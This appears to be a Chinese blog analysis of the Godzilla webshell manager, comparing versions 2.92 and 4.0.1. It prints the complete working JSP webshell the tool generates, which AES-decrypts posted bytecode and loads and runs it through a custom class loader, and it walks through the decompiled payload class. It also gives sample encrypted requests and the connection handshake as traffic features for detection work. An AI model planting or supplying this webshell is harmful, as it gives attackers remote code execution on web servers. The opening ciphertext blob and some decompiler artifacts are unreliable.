2VXP8HHufv9QhwvSrQbQbVjKN5D4y81sYNwTroR9wL4pcz+3P8XrvRmPqe47cLjdJQI6l0UqY4Zt6zP5XGPhkh08SNPmfzfyWSSxG+a5J5AmeVrQfht3w84346d7VzefCJppKKmvhcpcpbRgZrXQ9D8RmTSF1a4Gng3J5pGupRu2DzrIm+GpVXW/XYcbxaW10HaiOS9AYoVW5Nwa/xFNYHKAskytZZQIpsDam/FK9bY6xZl1mrIY1Phfe0BLy0R4onY0v6IVZx1D9CdLvewD5/3P2J5tw0nRznmzAQHW8Z8SYqtO5sjsoNiRpkGW7Tgef+kM3vcQfaOxoGV9CQngTamNpcMg7n2mPhRtm+ZKYWXodmgQThvkmerD0AWOYEN1O7d2oMASOfpaba06ulYOh433WTt/aVEhaRTaEdh6S8vL8oIUFY5E7Wm+UACg4N2lv4ZrB6G6w6wssHw/lWse1feA9jFCggKfl3rUOTqyBO+C3sSEXgU3cSQKhHRehbvLU7lqp61DVeduJBCuLPdioHeXqA5JyLlrH29RjeQq0lcTgNfdhJ/74gP48JiyZufI16gveG0glGKGPC9xUtb8uSoRHldj2bHpLV4VWg3yBaon/caBd/URl6+pw+jfceRWhKDc3Llsr4f7sfv3+hXc8hIbFBVfFBoNbL7YIjf8puLYnT+uycKWwFfZmdREYbOFkpNqcz9qzUhXGVW0CVDhl7td4tvds7cy8gUC1ERhs4WSk2pzP2rNSFcZVZd0CLp10kACQc7PLlvN6ivektEIiezin1MMCZwxtcIOjCmCteFY6TyXoJhiLT8Hzm0rQnefm7nZzDQxMOJEHMJgCBWWFACCbdSk4cUYFRz+bp/kZjXsLwzxddoQiOje1tojPe6EPZ3CCks/IRREFTFPQS4Mzct2Hz/s5/LwEFrviD1t7rKuwSv/YDETpRfIyUX/3P7d7cjPa+7FWzXApcigUyEeRQOX7P800Ds39tNDhm5N1Ft9qBPC2UVzNUBgeVdXX93Bo5tpbDrUtu4rYdV8M6RTFQaN+N1ej3OlCKRaOd+vAtacUdFyfEZA9mDecfH1wCO+OpIdNB2grI6hErsOwcPVi2IaZf4tBujSiDW677vq7e2U1AdR4HC5GDaVKMv8an56nryO4WWQ+hDHnItVkHXYsq5fkeLXlsneoN0HkGYmCtInYTTI/R7lqEYhrlwT7HiU+xrbn64ExTiJ+p7wIbIHsrn0daiiqP+gjGApwd8a4z7m4e4XzqRmA38AijbaNmfweZvLT9REQq8dSilELWmBcI+ztj/Xk06Kv2rAk7hPwCOS6u72W/LtK6JWmgf9JHDp5JNatPKRxI9QFiIrnXComoGtS4BiG9OZ9YZ89lC8nTLSTYo6N7RydV98hwX/3P7d7cjPa+7FWzXApcifIhgiJck2Fyr67pS+CjtQFdtd7p3nuyjnIDr95vtn1miFIsck82hUFVPPsW7TNduTbuFSucBxbM7Z6sZHxuMuXLGeym9uQU/fp01/ncTkA7gvgtwpI/mY42ij8TqW4vrl+JzhSpiFDqlm4wlx5DK3BokvIWxpflCteAVEzgcsQc3rpMPUEkof97+FG7maHpoT+wjk2EtVlB++gdUS+HahsAMmV2VYQRJciRkQoNWZfq58N/gXscpwBYPcCaR3/BwNv+t/WHMkol5T9e8GCdRKQ9GVBfiXcJbbAyyaPauiVkfUADbRkh491m3GTk1LmBMFZ46/zgqwhdfMvcPrSueHG74Lf1VSRN91mP+6VxqXVq59adFKSFfjtUK2UMgxIPCL8V32sI0vTW/1xWm6fLeDr3vbuPowdUjsVdQb+nwim+Uds64STsYxk7CWAJ48IaFn6C4S9bnJRVydlB12XSkGwEVfJvd0umWZu202+M31Bb/XO4pTuKqfLzI/gs0HTChGJ9fImBdlEBbxVz/WkuiELHqDVyUnsztQRR4nZ2+PVnoQqAPeGCgU8hXdHFaPpnoaaoWkspnu4un9kt7/KjzMbNkUXd8mtBKqRkzBfDGwTzsRS9fzQKyfQmP1WsPB2D9ofwjQx2+c49cXJoG/zK3rksW37qyYFG/h8RI+foRtEvABQwybRDBzLTPWJWJOvr3EKxMnBQmIg2actbGPDgmonu8RXj4dgXYRwYlL7NG5IA+Vqo53pXeGzGHDAmwTljZupVnn0vniHK+9hqmLSI1N2qvv5bjgjvzgTtpXZWSYz5YYa8+Yh1b3C8dfX9rDx63YEj0iyd3et8WJufF6WQhpjHOa8/mN2so5qyfw9xnx5hVmL3U5RwDO0ryhGXEngi/l6b4VRnSmI50HaJyCK2//WACr3ftauPj2dwDYqgxSnxYewyc9W8nqMGvkV+d4uc/y33Yr8mym176wQofrFSi9L+TeV28ovmzxK9rsAfC2mwcMxhNsgjVUSHMmUCQ6UlrwxUniSwqI3l2OD4VAXnE/4EscCnZ1R14nQkNKcD1VjHgO/GfaYp9HsIaBcozOsUz9eLYqY821Ngs4qjtPSMY8bDRKtEAti2pM+lAzzyO/7BKFgVZ2Zk4ExKphSg3z5sBFL51bcCihiaRXQJ2qanQu9VWuar1xpjnWUTLrjC8zTEQs9MU3HK18ms+oln6JDMum8z8WPLvu0kIGlKAqnbVAd/oV3PISGxQVXxQaDWy+2CI3/Kbi2J0/rsnClsBX2ZnURGGzhZKTanM/as1IVxlVtAlQ4Ze7XeLb3bO3MvIFAtREYbOFkpNqcz9qzUhXGVWXdAi6ddJAAkHOzy5bzeorxDTixJgjYv6MMfaZg85p/zw6nN46fLc0QPGX6092JJNtXvSWVe/tHtHUZ7DPuCychGpdkScwBfERDaCTVgzma2+CJhT77ZWMqVfLnzgSPcF/w8nGRjs+zI5tfkPpWOOYRUex+w8HP/GQGmd5w24SAEFDsg81OKWpQ1wSQfI+IdYm5PEcScgCYZzX41LjLUgNCmvyN4P3uiIf3/4p4I75wqHKOJ1r1MHpupBj+U8QnY4bEkBgBAwHeNEFyooohpjfDmy8l78BU5e+OYiy0ltuZf1NNzJNL1pQOBwUFZRZbbvtonCAiY2bKeMqOBeUfti9+FXX7kVyrA04MwCwkNF5j9sSJeCkbRJDz4aNoX4eUIE0dNzHeSayXi1FGLh0HvU3Srids+PliHxids7vDco36FbEhhA2END/j7KMbo+Ym2iHSuKfuvDV4oEKNe7l6DOpGqplH0Z4vs7KjGGpLL3H+82O9DHVK9wXbGGqLK26MqvbzLw//Ct3i1461UiZwM4kQXJsGG0TKSc2HemIjXHbkOcDkA/N66HCwH0p7fnerfCZC6G7//M0kizu93M7ygYAKa+Ecb25uNnvDCIs1jsXQWJ/lB9I4HCYrijB5hYnQatDV9ZbwQooeF6HHDjHKZDqBxFO+74UMxnH84dhLeZsublueLnGmvzp7EoXq/WE/CvqNrzutqj++iH5ASYTf2yfKtmSa6q4wDCEx9ltI9TLI3FfKbugVU/QKPgKflfhUmM6OibuHt4D2UW4z5POfGF1x7etc1Zrj4rALaA2aSjVN0wehHdbLk2o8piEsp1H3E47QxTpR5h0xzy3LMZEc8JWdO/AKRy0EhbJcOmib6hg9cq9AI7SpoFs/vTOsnM1+5GQ3aqT+Su8iTVEolVddhPp5Gk2jFpKqBXqbFI0rMsDtsX/3P7d7cjPa+7FWzXApcifIhgiJck2Fyr67pS+CjtQFdtd7p3nuyjnIDr95vtn1mvdd15xb6AXvp1JL/XDmesPZb+2TiNve+TsHmsX168cUNL8N2EaHhY7k34+AD0OHQVzsFQvRm3ta7hert0YIa4VeRCH7OhZc6DUTC32/RHzG5rHZ4Q4tQvImnTVisH2lHW7651VCUX41NiTeM9Y4PYw6G3ZUwVixRlZpJBRdBwmNXz0RhVfiP3XNEOLIs1Q27DobdlTBWLFGVmkkFF0HCYuYaFhtwAM0JtkXB6/JToLDmy8l78BU5e+OYiy0ltuZebkxAJAJ5BcnxOx4qfZo4FHWhtqb7YlFT4/XNVx2Yvcq84xJxHWhB4vIlB8dJroiXPlR48gr518TA4P0BbQ+CKnIuSngXpm97AXxaVkaCvytsC4qSoUN2kEh8Q1AYblaFk+O6i95S0M34eeO6kr1yLbYZSHi7ZdsxFL0RPg9JiB341E7UJAFR16DkjOiXxWBtdF+j82QTCGbxkhA0MSlnIbJMpk5klxEbCsAbZ8k8vqa9XJRfEU4LVnKCU+UghAan1ZppkJoKbKVOBVomaFl9/f3Vss1JBF84zjIjDPwx93FGjLReqLvrZoMiCRpWmKSVfdAhc2WtwCwIHzGSV8cZFynosWHVib0+S3wFrKULhJeoko/i7CoEbA2l1YGKvdJ83g4OdUBz6KhYTJNRmhSmRJ1Cspc9jGxuHMx3urFrFj1Uhwtjj1LYFrxRYDP4LEoznbATXTKTLUtuLG34Wj3+hHQ4teF5/8kqgHD81GoBdnVBV1RzN2YBOgOu+Oou0BLk5BjwhFlD4qsYA7XfGo3jNIA0uHhinaGdXDrZtYB4qcFw5GCZj6MsCu7wdGycP4uGw/NiTFn7K6DWUc6fp2FrOWoX3pgp6zMCQh/HyMqRLbvGVFjKeVhx30HS9bMHpaTYYhgqbA2yROUePjVedyFz13gAViH7NjI8BYqm8qsa6mLSx/Bj9XxSOadloHBjZwLMrdHPPM2diIrc4kP5+t4aTg1rOz6LXRmHVbacp4nvogbz6az+2khWsRFymz0Qu4qlmbD12K/C4B7nok9TwxrF9PTKQl32Uyk9O8Gart4Dlm89aXAAuXBHKkYaK+G8ttlwXfco67kiPO2kzDYWpj3LcX3QIXNlrcAsCB8xklfHGRcp6LFh1Ym9Pkt8BaylC4SXqJKP4uwqBGwNpdWBir3SfN4ODnVAc+ioWEyTUZoUpkSdQrKXPYxsbhzMd7qxaxY91hAQC4nE9onL13skShpKSfZfSXYYAXsoQ62hDJzrsRcHWq9KR9S+OrUWChzg3f59fn+1rWjfoLYdQTqPEbKFI7BFAcZTXCYCQW8CNdAu/nLEw20WyTe6TcKg8D7MVaUjCFuB8gIChJmf8tnQTB9cvVhsQ9aAZOrZ9MGc9mfPUiH2X0l2GAF7KEOtoQyc67EXB1qvSkfUvjq1Fgoc4N3+fQ44up+F1lsh0sO+42tgD1f+qfIGH1wB2Wg2MYAEUu61KZ4vhAnBl7uP/t1BUjCK0x8OsCkfV9aNPWbQXAX1qGAFHEefY5UAZqshmNNnocVSebuBq0NrAZ9M7wN6U9AWwXNN9GEsl7gNUFVoIrYO9sdROpaEw67W+jgi6xFqSKtg/JYRZdWKlctrYKZRmGC+cHlSrTC4OQPyuNFDeLUwFllZhe55j/0vBKp958cjdstHpqjuvI5PwwCfi0aSmXF68gReEqgFgnqwI1H84nl4l8EzKWk5ytNbg5UA7pzABhFSJmkfEMS7qhg4iiMdhezZxfZfSXYYAXsoQ62hDJzrsRcHWq9KR9S+OrUWChzg3f59Dji6n4XWWyHSw77ja2APVPTH02/e5Vwb+Dpu0FCSbNvSBY3E9BVYfebtJdbJVlbo6N9t2DSsTJ5uhBAjuwybhuMiemF8GhUCa4kJltHJoSYtKhcIc4GmwEzJKRLvy3JGzGqBrxzcH57whbL3EAOhft7RoG3qqkXZocN8NjbGoHhSFZnN0BcJS2Nn98pE2r6jHGr0JKkGk3E9GcwQfzyJV6ao7ryOT8MAn4tGkplxevIEXhKoBYJ6sCNR/OJ5eJfAUGsZfqh1iAe1fyOPbni0j0IvmlidO2ncgurosx7xn+eoxsgeWgAtK1FUM+5jb4vAuz7AdGv3nrge5aiFF1sAxxLWx2Z17LUcHyiCIeEJ/AsZhNgKerCSqphcb133j6dHHoiWSvRaqrNrKE4KOiraP6a9zlbgpNMFS9kbgF/Jk6cr0AT+hknu8GiaplXsVvx57+mpQgYKcj09wccevp+SI74UKf4SWcKPSvwbO3Xc3bWV3l4bPabPDOQCQsJvx6fIbaLX8BJP2oszybc8bFJVEYwFLueOa3tlOEHeIMHwhtYRxthKodQ3xKnWQ5HhW2nx7zBWDH3w6xFSi/RIC/A8VTS4YKoe3hqqWNeeaz3wbVcsBwtqgN8O4j3DFVoxEuGTlylmsSBeN+B4md6BB/NRk1eZQRMfssOEFj/1SpvwIp3jUssnAfqVTTPDOawBH65vfWY/9M64qSgG0vCRu8ecjbZl3DNI9480yw/2tI25rAT7BUyqmGlHvAzNWkn2diRg4Ed9Kl1mYOy8ICTs0WpSD8UQeuiN6Qxf60e8DIsln51UVKxLlQqBavj/ndTWRRGoJki6Z34Kj5YNj1nAUSSRa731HNuD8B75hfDXHncNWMjxLLF1qXg4URpSM99G6Y8JwlhCMSZEjQrvaG4T44Pv/ZRMUylsNErJsk3YX8XQK17uwFrUEbyyeZD85kv9nNgacfKS0fAXNWHfL/XAI1QWocIZd36LtzwhSUwtLxBdp+Jem2NV0F9IghHEweiUvmzvVHEOm42o+c7ulIpVZjzFeDXieaJt6w8ys6QGIMm51I37jtWjs0MDr9VWdjNp6dvZAP3O0GUWL1II1WSDtHoXJDCH3zMe2879SJtZPKbnzMmsH92VGQGaWUgPTZq/Zsy6Eq2Js3t+/onx7N6lV6nNpHaM+70yk8O9FlZVDSM8yFyHk3pQbJn+EcfSTYt30/TV7QaYWqexCz4mCt1qk3VSx6C37AC826A2A04BC
此时将命令执行结果bae64和AES解密后字符串就是基础信息页面显示的内容
哥斯拉V4.0.1
根据工具说明可以知道,3.0版本是一个分水岭,3.0以上版本的WebShell管理器无法连接2.92生成的JSP木马。具体看一下生成的JSP木马,这里直接贴的最新的V4.0.1版本生成的jsp
<%!
String xc="3c6e0b8a9c15224a"; // 密钥默认为"key"
String pass="pass"; //默认密码
String md5=md5(pass+xc);
class X extends ClassLoader{ // 类加载器
public X(ClassLoader z){super(z);}
public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }
public byte[] x(byte[] s,boolean m){ //字节码进行AES加密
try{
/*
Cipher密码相关类,支持的常见算法包括AES、RSA、SHA-256等
参数m:true加密,false解密
*/
javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");
c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));
return c.doFinal(s);
}
catch (Exception e){return null; }
}
/*
MessageDigest:提供信息摘要算法如 MD5 或 SHA 算法
getInstance()方法获取对象,参数md5为选取的算法种类
*/
public static String md5(String s) {
String ret = null;
try {
java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");
m.update(s.getBytes(), 0, s.length());
ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();
}catch (Exception e) {}
return ret;
}
public static String base64Encode(byte[] bs) throws Exception {
Class base64;String value = null;
try {
base64=Class.forName("java.util.Base64");
Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);
value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });
} catch (Exception e) {
try {
base64=Class.forName("sun.misc.BASE64Encoder");
Object Encoder = base64.newInstance();
value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });
}
catch (Exception e2) {}
}
return value;
}
public static byte[] base64Decode(String bs) throws Exception {
Class base64;
byte[] value = null;
try {
base64=Class.forName("java.util.Base64");
Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);
value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });
} catch (Exception e) {
try {
base64=Class.forName("sun.misc.BASE64Decoder");
Object decoder = base64.newInstance();
value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });
}catch (Exception e2) {}
}
return value;
}
%>
<%
try{
byte[] data=base64Decode(request.getParameter(pass)); // 字节码base64解密
data=x(data, false); //字节码AES解密
if (session.getAttribute("payload")==null){
// 将加载到的Class放到payload
session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));
} else{
request.setAttribute("parameters",data); // 类字节码放到parameters
java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();
Object f=((Class)session.getAttribute("payload")).newInstance(); // 类实例化
f.equals(arrOut);
f.equals(pageContext);
response.getWriter().write(md5.substring(0,16));
f.toString();
response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true))); //AES加密、Base64加密
response.getWriter().write(md5.substring(16));
}
}catch (Exception e){}
%>
区别在于jsp下半部分
// V2.92
f.equals(pageContext);
response.getWriter().write(md5.substring(0,16));
response.getWriter().write(base64Encode(x(base64Decode(f.toString()), true)));
response.getWriter().write(md5.substring(16));}
// V4.0.1
f.equals(arrOut);
f.equals(pageContext);
response.getWriter().write(md5.substring(0,16));
f.toString();
response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true))); //AES加密、Base64加密
response.getWriter().write(md5.substring(16));
很明显,equals和toString的功能改变了。具体看一下代码。
(1)equals
equals依旧调用了noLog,但是equals不再判断传入的对象是否为PageContext,而是调用handle方法
public boolean equals(Object obj) {
if (obj != null && handle(obj)) {
noLog(this.servletContext);
return true;
}
return false;
}
handle
具体看一下handle,判断传入的对象的类型。
public boolean handle(Object obj) {
if (obj == null)
return false;
if (class$1 == null)
try {
} catch (ClassNotFoundException classNotFoundException) {
throw new NoClassDefFoundError(null.getMessage());
}
if ((class$1 = Class.forName("java.io.ByteArrayOutputStream")).isAssignableFrom(obj.getClass())) {
this.outputStream = (ByteArrayOutputStream)obj;
return false;
}
if (supportClass(obj, "%s.servlet.http.HttpServletRequest")) {
this.servletRequest = obj;
} else if (supportClass(obj, "%s.servlet.ServletRequest")) {
this.servletRequest = obj;
} else {
if (class$0 == null)
try {
} catch (ClassNotFoundException classNotFoundException) {
throw new NoClassDefFoundError(null.getMessage());
}
if ((class$0 = Class.forName("[B")).isAssignableFrom(obj.getClass())) {
this.requestData = (byte[])obj;
} else if (supportClass(obj, "%s.servlet.http.HttpSession")) {
this.httpSession = obj;
}
}
handlePayloadContext(obj);
if (this.servletRequest != null && this.requestData == null) {
if (class$2 == null)
try {
} catch (ClassNotFoundException classNotFoundException) {
throw new NoClassDefFoundError(null.getMessage());
}
false[class$2] = class$2 = Class.forName("java.lang.String");
Object retVObject = this.servletRequest.getMethodAndInvoke("getAttribute", (String)new Class[1], new Class[1],
new Object[] { "parameters" });
if (retVObject != null) {
if (class$0 == null)
try {
} catch (ClassNotFoundException classNotFoundException) {
throw new NoClassDefFoundError(null.getMessage());
}
if ((class$0 = Class.forName("[B")).isAssignableFrom(retVObject.getClass()))
this.requestData = (byte[])retVObject;
}
}
return true;
}
有如下几种类型,如果对象是一类型的,就赋值给对应的变量。
ByteArrayOutputStream -> this.outputStream
HttpServletRequest | ServletRequest -> this.servletRequest
[B (byte[].class) -> this.requestData
HttpSession -> this.httpSession
supportClass
根据handle方法的实现,传入classNameString的参数一般为%s.servlet.http.HttpServletRequest、%s.servlet.ServletRequest、%s.servlet.http.HttpSession,根据String.format可知%s代表javax或jakarta。getClass方法的实现就是Class.forName(name);
class1.isAssignableFrom(class2)则是用于判断class2是不是class1的子类或者子接口。也就是判断传入的这个Obj对象是否为HttpServletRequest、ServletRequest、HttpSession这三个支持的类型中的一个,是就返回true,否则false。
private boolean supportClass(Object obj, String classNameString) {
if (obj == null)
return false;
boolean ret = false;
Class c = null;
try {
if ((c = getClass(String.format(classNameString, new Object[] { "javax" }))) != null)
ret = c.isAssignableFrom(obj.getClass());
if (!ret && (c = getClass(String.format(classNameString, new Object[] { "jakarta" }))) != null)
ret = c.isAssignableFrom(obj.getClass());
} catch (Exception exception) {}
return ret;
}
handlePayloadContext
通过传入对象获取Request、ServletContext、Session对象,分别对应的存储对象是servletRequest、servletContext、httpSession
private void handlePayloadContext(Object obj) {
try {
Method getRequestMethod = getMethodByClass(obj.getClass(), "getRequest", null);
Method getServletContextMethod = getMethodByClass(obj.getClass(), "getServletContext", null);
Method getSessionMethod = getMethodByClass(obj.getClass(), "getSession", null);
if (getRequestMethod != null && this.servletRequest == null)
this.servletRequest = getRequestMethod.invoke(obj, null);
if (getServletContextMethod != null && this.servletContext == null)
this.servletContext = getServletContextMethod.invoke(obj, null);
if (getSessionMethod != null && this.httpSession == null)
this.httpSession = getSessionMethod.invoke(obj, null);
} catch (Exception exception) {}
}
(2)toString
V2.92版本中,toString主要是用来调用run方法,然后清空request的parameters属性。V4.0.1版本中同样调用了run,但是前提是当parameterMap中有evalNextData属性时
public String toString() {
String returnString = null;
if (this.outputStream != null) {
try {
initSessionMap();
GZIPOutputStream gzipOutputStream = new GZIPOutputStream(this.outputStream);
formatParameter();
if (this.parameterMap.get("evalNextData") != null) {
run();
this.requestData = (byte[])this.parameterMap.get("evalNextData");
formatParameter();
}
gzipOutputStream.write(run());
gzipOutputStream.close();
this.outputStream.close();
} catch (Throwable e) {
returnString = e.getMessage();
}
} else {
returnString = "outputStream is null";
}
this.httpSession = null;
this.outputStream = null;
this.parameterMap = null;
this.requestData = null;
this.servletContext = null;
this.servletRequest = null;
this.sessionMap = null;
return returnString;
}
initSessionMap()的逻辑比较简单,如果session中存在sessionMap属性,就将它的值赋值给this.sessionMap,否则就创建一个sessionMap属性
formatParameter
将类中的变量this.XXX都存放在parameterMap中,GZIPOutputStream用于GZIP压缩,GZIPInputStream则是解压缩。可以看到在4.X版本开始采取了数据压缩的方式,从this.requestData中解压缩数据,读取数据中的内容,也放入parameterMap中。
public void formatParameter() {
this.parameterMap.clear();
this.parameterMap.put("sessionMap", this.sessionMap);
this.parameterMap.put("servletRequest", this.servletRequest);
this.parameterMap.put("servletContext", this.servletContext);
this.parameterMap.put("httpSession", this.httpSession);
byte[] parameterByte = this.requestData;
ByteArrayInputStream tStream = new ByteArrayInputStream(parameterByte);
ByteArrayOutputStream tp = new ByteArrayOutputStream();
String key = null;
byte[] lenB = new byte[4];
byte[] data = null;
try {
GZIPInputStream inputStream = new GZIPInputStream(tStream);
while (true) {
byte t = (byte)inputStream.read();
if (t == -1)
break;
if (t == 2) { // 判断是否为等于号
key = new String(tp.toByteArray());
inputStream.read(lenB);
int len = bytesToInt(lenB);
data = new byte[len];
int readOneLen = 0;
do {
} while ((readOneLen += inputStream.read(data, readOneLen, data.length - readOneLen)) < data.length);
this.parameterMap.put(key, data);
tp.reset();
continue;
}
tp.write(t);
}
tp.close();
tStream.close();
inputStream.close();
} catch (Exception exception) {}
}
第一个t为109,tp.write(t)得到m。第二t为101,tp.write(t)得到的是me,以此类推。t==2的时候,即当前字符为等于号,会把当前tp中所有内容转换成字符串赋值给key,默认情况下为methodName。在do-while循环中将后续字符赋值给data。
run
和2.92版本类似,如果在没有传入类名就是从Payload类中调用对应的方法
public byte[] run() {
try {
String className = get("evalClassName");
String methodName = get("methodName");
if (methodName != null) {
if (className == null) {
Method method = getClass().getMethod(methodName, null);
if (class$0 == null)
try {
} catch (ClassNotFoundException classNotFoundException) {
throw new NoClassDefFoundError(null.getMessage());
}
if (class$0.isAssignableFrom(class$0 = Class.forName("[B")))
return (byte[])method.invoke(this, null);
return "this method returnType not is byte[]".getBytes();
}
Class evalClass = (Class)this.sessionMap.get(className);
if (evalClass != null) {
Object object = evalClass.newInstance();
object.equals(this.parameterMap);
object.toString();
Object resultObject = this.parameterMap.get("result");
if (resultObject != null) {
if (class$0 == null)
try {
} catch (ClassNotFoundException classNotFoundException) {
throw new NoClassDefFoundError(null.getMessage());
}
if ((class$0 = Class.forName("[B")).isAssignableFrom(resultObject.getClass()))
return (byte[])resultObject;
return "return typeErr".getBytes();
}
return new byte[0];
}
return "evalClass is null".getBytes();
}
return "method is null".getBytes();
} catch (Throwable e) {
ByteArrayOutputStream stream = new ByteArrayOutputStream();
PrintStream printStream = new PrintStream(stream);
e.printStackTrace(printStream);
printStream.flush();
printStream.close();
return stream.toByteArray();
}
}
V4.0.1 流量特征
第一次请求
请求头部,User-Agent变了,不再是Java/version,而是User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
POST /MemShellShowTest_war_exploded/gslfor.jsp HTTP/1.1
User-Agent: Java/1.8.0_241
Host: localhost:8080
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive
Content-type: application/x-www-form-urlencoded
Content-Length: 33035
请求Body依旧是pass=xxx,pass后的数据可以通过Base64、AES解密得到类的源码如下,里面依旧是Payload.class中的内容
public class SettableBeanProperty extends ClassLoader {
...
}
第二次请求
POST body中的内容,同样进行base64和AES解密后发现还不是明文,这就看到上述formatParameter方法的区别,进行了数据的解压缩。
pass=0mQU%2BS1pFnTz3ttVTnAgJVD%2FaBwD3NNXL3TfTExo1weKu4KAhhCu6Gn1EQfX1m9g
经过base64、AES解密、formatParameter解压缩后得到key为methodName,data为test
响应中的内容,前16位依旧是md5的前16位11CD6A8758984163,后16位为md5的后16位6C37AC826A2A04BC,中间的内容经过Base64、AES、解压缩后得到的key为ok,没有data
11CD6A8758984163LF/IpkPvM0iJI4wmpBs2DaoBVvcbDMpwuL7nYS3n/k4=6C37AC826A2A04BC
第三次请求
pass=0mQU%2BS1pFnTz3ttVTnAgJaL8TCstIesj%2BWp7L6WqrPFRQBfGySSNFnReaHo2SeeFe0GmFqnsQs%2BJgrdapN1UsQ%3D%3D
经过base64、AES解密、formatParameter解压缩后得到key为methodName,data为getBasicsInfo
所以在木马连接上,版本的逻辑并没有改变。
(1)发送Payload类的源码,http响应为空
(2)发送参数test,执行Payload中的test方法,如果连接成功,返回内容是ok
(3)发送参数getBacisInfo,执行Payload中的getBacisInfo方法,返回基本信息
网友评论